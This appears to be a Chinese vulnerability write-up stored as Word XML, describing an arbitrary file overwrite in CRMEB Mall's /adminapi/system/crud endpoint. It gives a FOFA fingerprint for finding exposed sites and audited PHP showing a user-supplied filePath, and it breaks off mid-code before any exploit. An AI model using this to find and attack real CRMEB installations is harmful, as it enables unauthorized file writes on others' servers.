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100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
        </w:rPr>
        <w:t>众邦科技</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
        </w:rPr>
        <w:t>CRMEB Mall business edition overrides any file</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="u328b144f"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>源码地址：</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://gitee.com/ZhongBangKeJi/CRMEB" \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>https://gitee.com/ZhongBangKeJi/CRMEB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:p>
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="u4a66817c"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>源码归属：众邦科技</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="1"/>
    <w:p>
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="u1cc6efe7"/>
      <w:bookmarkStart w:id="3" w:name="u737724b0"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4300855" cy="1043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01067" cy="1044120"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkStart w:id="4" w:name="ua05054c4"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4300855" cy="1901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301067" cy="1901790"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:bookmarkEnd w:id="3"/>
    <w:p>
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="u340411c1"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>公司官网：</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://www.crmeb.com/" \h </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>https://www.crmeb.com/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="5"/>
    <w:p>
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="u83298ec9"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>源码使用量 有12260个IP</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="6"/>
    <w:p>
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="ue03dbbbf"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>fofa：icon_hash="-847565074"</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="7"/>
    <w:p>
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="uc42b4257"/>
      <w:bookmarkStart w:id="9" w:name="uef0e3802"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5841365" cy="34048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7890934" cy="4599870"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:bookmarkEnd w:id="9"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="Kj0pJ"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
        </w:rPr>
        <w:t>代码审计</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="10"/>
    <w:p>
      <w:pPr>
        <w:spacing w:beforeLines="100" w:after="50" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="27"/>
      <w:bookmarkStart w:id="11" w:name="u72af6221"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Interface: /adminapi/system/crud processing code is as follows</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="11"/>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2" w:name="TCtFw"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>public function save(SystemCrudDataService $service, $id = 0)</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$data = $this-&gt;request-&gt;postMore([</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            ['pid', 0],//上级菜单id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            ['menuName', ''],//菜单名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            ['tableName', ''],//表名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            ['modelName', ''],//模块名称</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            ['tableComment', ''],//表备注</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            ['tableField', []],//表字段</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            ['tableIndex', []],//索引</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            ['filePath', []],//生成文件位置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            ['isTable', 0],//是否生成表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            ['deleteField', []],//删除的表字段</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$fromField = $searchField = $hasOneField = $columnField = $tableIndex =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$dictionaryids = array_column($data['tableField'], 'dictionary_id');</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        if ($dictionaryids) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            $dictionaryList = $service-&gt;getColumn([['id', 'in', $dictionaryids]], 'value', 'id');</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            foreach ($dictionaryList as &amp;$value) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                $value = is_string($value) ? json_decode($value, true) : $value;</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 else {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            $dictionaryList = [];</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foreach ($data['tableField'] as $item) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            //判断字段长度</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            if (in_array($item['field_type'], [FormTypeEnum::DATE_TIME, 'timestamp', 'time', 'date', 'year']) &amp;&amp; $item['limit'] &gt; 6) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                return app('json')-&gt;fail('字段' . $item['field'] . '长度不能大于6');</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if ($item['field_type'] == 'enum' &amp;&amp; !is_array($item['limit'])) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                return app('json')-&gt;fail('数据类型为枚举时,长度为数组类型');</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//收集列表展示数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            if ($item['is_table'] &amp;&amp; !in_array($item['field_type'], ['primaryKey', 'addSoftDelete'])) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                if (isset($item['primaryKey']) &amp;&amp; !$item['primaryKey']) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    $columnField[] = [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                        'field' =&gt; $item['field'],</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                        'name' =&gt; $item['table_name'] ?: $item['comment'],</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                        'type' =&gt; $item['from_type'],</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$name = $item['table_name'] ?: $item['comment'];</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            $option = $item['options'] ?? (isset($item['dictionary_id']) ? ($dictionaryList[$item['dictionary_id']] ?? []) : []);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            //收集表单展示数据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            if ($item['from_type']) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                if (!$name) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    return app('json')-&gt;fail(500048, [], ['field' =&gt; $item['field']]);</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if (!$option &amp;&amp; in_array($item['from_type'], [FormTypeEnum::RADIO, FormTypeEnum::SELECT])) {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    return app('json')-&gt;fail('表单类型为radio或select时,options字段不能为空');</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$fromField[] = [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    'field' =&gt; $item['field'],</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    'type' =&gt; $item['from_type'],</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    'name' =&gt; $name,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                    'required' =&gt; $item['required'],</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="Courier New" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
